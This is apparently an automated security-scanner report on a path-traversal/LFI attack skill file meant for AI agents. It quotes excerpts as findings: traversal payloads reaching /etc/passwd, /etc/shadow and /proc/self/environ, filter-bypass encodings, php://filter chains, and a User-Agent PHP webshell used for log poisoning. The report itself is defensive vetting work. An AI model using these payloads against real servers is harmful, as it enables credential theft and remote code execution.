path-traversal-lfi

https://raw.githubusercontent.com/yaklang/hack-skills/main/skills/path-traversal-lfi/SKILL.md

github.com/yaklang/hack-skills

Scanned Thu, 28 May 2026 17:25:31 GMT

Scan ID crawl-y382u320qy74vqno1wir3yah · 5ms

SCORE 55 / 100

Verdict: Proceed with caution

27 high-severity findings.

This skill reads protected filesystem locations plus 27 other issues listed below.

0 critical27 high1 medium-16 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 27 high-severity findings (3+ HIGHs → C).

0 CRIT27 HIGH1 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 25 of 27 HIGH (cap is 2).
A
Reach Atarget score 95
Resolve all 27 HIGH.

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 21CWE-552

▾

20```text

21../etc/passwd← sensitive path — credential-exfiltration vector

22../../../../etc/passwd

23..%2f..%2f..%2fetc%2fpasswd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 22CWE-552

▾

20```text

21../etc/passwd

22../../../../etc/passwd← sensitive path — credential-exfiltration vector

23..%2f..%2f..%2fetc%2fpasswd

24..%252f..%252f..%252fetc%252fpasswd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 40CWE-552

▾

39Traversal attack:

40http://target.com/index.php?page=../../../../etc/passwd← sensitive path — credential-exfiltration vector

41→ Opens: /etc/passwd

42```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 41CWE-552

▾

39Traversal attack:

40http://target.com/index.php?page=../../../../etc/passwd

41→ Opens: /etc/passwd← sensitive path — credential-exfiltration vector

42```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 52CWE-552

▾

50### Basic

51```

52../../../etc/passwd← sensitive path — credential-exfiltration vector

53..\..\..\windows\system32\drivers\etc\hosts (Windows)

54```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 78CWE-552

▾

76```

77..%2F..%2Fetc%2Fpasswd

78....//....//etc/passwd ← double-dot with slash (filter strips single ../)← sensitive path — credential-exfiltration vector

79```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 89CWE-552

▾

87### Null Byte Injection (legacy PHP < 5.3.4)

88```

89../../../../etc/passwd%00.jpg ← %00 truncates string, strips .jpg extension← sensitive path — credential-exfiltration vector

90../../../../etc/passwd%00.php

91```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 90CWE-552

▾

88```

89../../../../etc/passwd%00.jpg ← %00 truncates string, strips .jpg extension

90../../../../etc/passwd%00.php← sensitive path — credential-exfiltration vector

91```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 99CWE-552

▾

97### Linux

98```

99/etc/passwd ← user list (usernames, UIDs)← sensitive path — credential-exfiltration vector

100/etc/shadow ← password hashes (requires root-level file read)

101/etc/hosts ← internal hostnames → pivot targets

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 100CWE-552

▾

98```

99/etc/passwd ← user list (usernames, UIDs)

100/etc/shadow ← password hashes (requires root-level file read)← sensitive path — credential-exfiltration vector

101/etc/hosts ← internal hostnames → pivot targets

102/etc/hostname ← server hostname

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 103CWE-552

▾

101/etc/hosts ← internal hostnames → pivot targets

102/etc/hostname ← server hostname

103/proc/self/environ ← process environment (DB creds, API keys!)← sensitive path — credential-exfiltration vector

104/proc/self/cmdline ← process command line

105/proc/self/fd/0 ← stdin file descriptor

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 197CWE-552

▾

195```

196?page=php://filter/convert.base64-encode/resource=config.php

197?page=php://filter/convert.base64-encode/resource=/etc/passwd← sensitive path — credential-exfiltration vector

198?page=php://filter/read=string.rot13/resource=config.php

199?page=php://filter/convert.iconv.UTF-8.UTF-16LE/resource=config.php

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 205CWE-552

▾

203**Chain filters** (multiple transforms to bypass input filters):

204```

205?page=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/passwd← sensitive path — credential-exfiltration vector

206```

207

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 225CWE-552

▾

223PHP has a historical path length limit. Pad with `.` or `/./` to truncate appended extension:

224```

225?page=../../../../etc/passwd/./././././././././././............ (255+ chars)← sensitive path — credential-exfiltration vector

226```

227When server appends `.php`, the truncation drops it.

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 231CWE-552

▾

229Or null byte if PHP < 5.3.4:

230```

231?page=../../../../etc/passwd%00← sensitive path — credential-exfiltration vector

232```

233

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 259CWE-552

▾

257□ Try mixed: ..%2F or ..%5C (backslash on Linux)

258□ Try redundant sequences: ....// or ..././ (strip once → still ../)

259□ Try null byte: /../../../etc/passwd%00← sensitive path — credential-exfiltration vector

260□ Try absolute path: /etc/passwd (if no path prefix added)

261□ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 260CWE-552

▾

258□ Try redundant sequences: ....// or ..././ (strip once → still ../)

259□ Try null byte: /../../../etc/passwd%00

260□ Try absolute path: /etc/passwd (if no path prefix added)← sensitive path — credential-exfiltration vector

261□ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini

262```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 270CWE-552

▾

268```

269Path traversal (read arbitrary files)

270├── Read /etc/passwd → enumerate users← sensitive path — credential-exfiltration vector

271├── Read /proc/self/environ → find API keys, DB passwords in env

272├── Read app config files → find credentials → horizontal movement

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 271CWE-552

▾

269Path traversal (read arbitrary files)

270├── Read /etc/passwd → enumerate users

271├── Read /proc/self/environ → find API keys, DB passwords in env← sensitive path — credential-exfiltration vector

272├── Read app config files → find credentials → horizontal movement

273├── Read SSH private keys → direct server login

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 294CWE-552

▾

292| Log Poisoning (Mail) | LFI + mail log readable | Send email with PHP in subject → include `/var/log/mail.log` |

293| /proc/self/fd bruteforce | LFI + Linux | Bruteforce `/proc/self/fd/0` through `/proc/self/fd/255` for open file handles containing injected content |

294| /proc/self/environ | LFI + CGI/FastCGI | Inject PHP in `User-Agent` header → include `/proc/self/environ` |← sensitive path — credential-exfiltration vector

295| iconv CVE-2024-2961 | glibc < 2.39, PHP with `php://filter` | `php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=` chain to heap overflow → RCE. Tool: cnext-exploits |

296| phpinfo() assisted | LFI + phpinfo page accessible | Race condition: upload tmp file via multipart to phpinfo → read tmp path from response → include before cleanup |

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 419CWE-552

▾

417```

418

419### 2. /proc/self/environ Poisoning← sensitive path — credential-exfiltration vector

420```

421# If User-Agent is reflected in process environment:

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 422CWE-552

▾

420```

421# If User-Agent is reflected in process environment:

422GET /vuln.php?page=/proc/self/environ← sensitive path — credential-exfiltration vector

423User-Agent: <?php system($_GET['c']); ?>

424```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 683CWE-552

▾

681

682```text

683GET /%252e%252e/%252e%252e/etc/passwd← sensitive path — credential-exfiltration vector

684```

685

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 699CWE-552

▾

697```

698

699Nginx maps `/assets../etc/passwd` to `/data/../etc/passwd` to `/etc/passwd` because `alias` replaces the exact location prefix (`/assets`) with the alias path (`/data/`), and `../` in the remainder traverses out.← sensitive path — credential-exfiltration vector

700

701```text

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 702CWE-552

▾

700

701```text

702GET /assets../etc/passwd HTTP/1.1← sensitive path — credential-exfiltration vector

703GET /assets..%2f..%2fetc%2fpasswd HTTP/1.1

704```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 743CWE-552

▾

741```text

742GET /files/..%2f..%2f..%2fetc%2fpasswd

743req.params.name = "../../../etc/passwd" (already decoded)← sensitive path — credential-exfiltration vector

744path.join(__dirname, 'uploads', '../../../etc/passwd') = /etc/passwd

745```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 744CWE-552

▾

742GET /files/..%2f..%2f..%2fetc%2fpasswd

743req.params.name = "../../../etc/passwd" (already decoded)

744path.join(__dirname, 'uploads', '../../../etc/passwd') = /etc/passwd← sensitive path — credential-exfiltration vector

745```

746

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

Scan another →Share

skillox.io/r/crawl-y382u320qy74vqno1wir3yah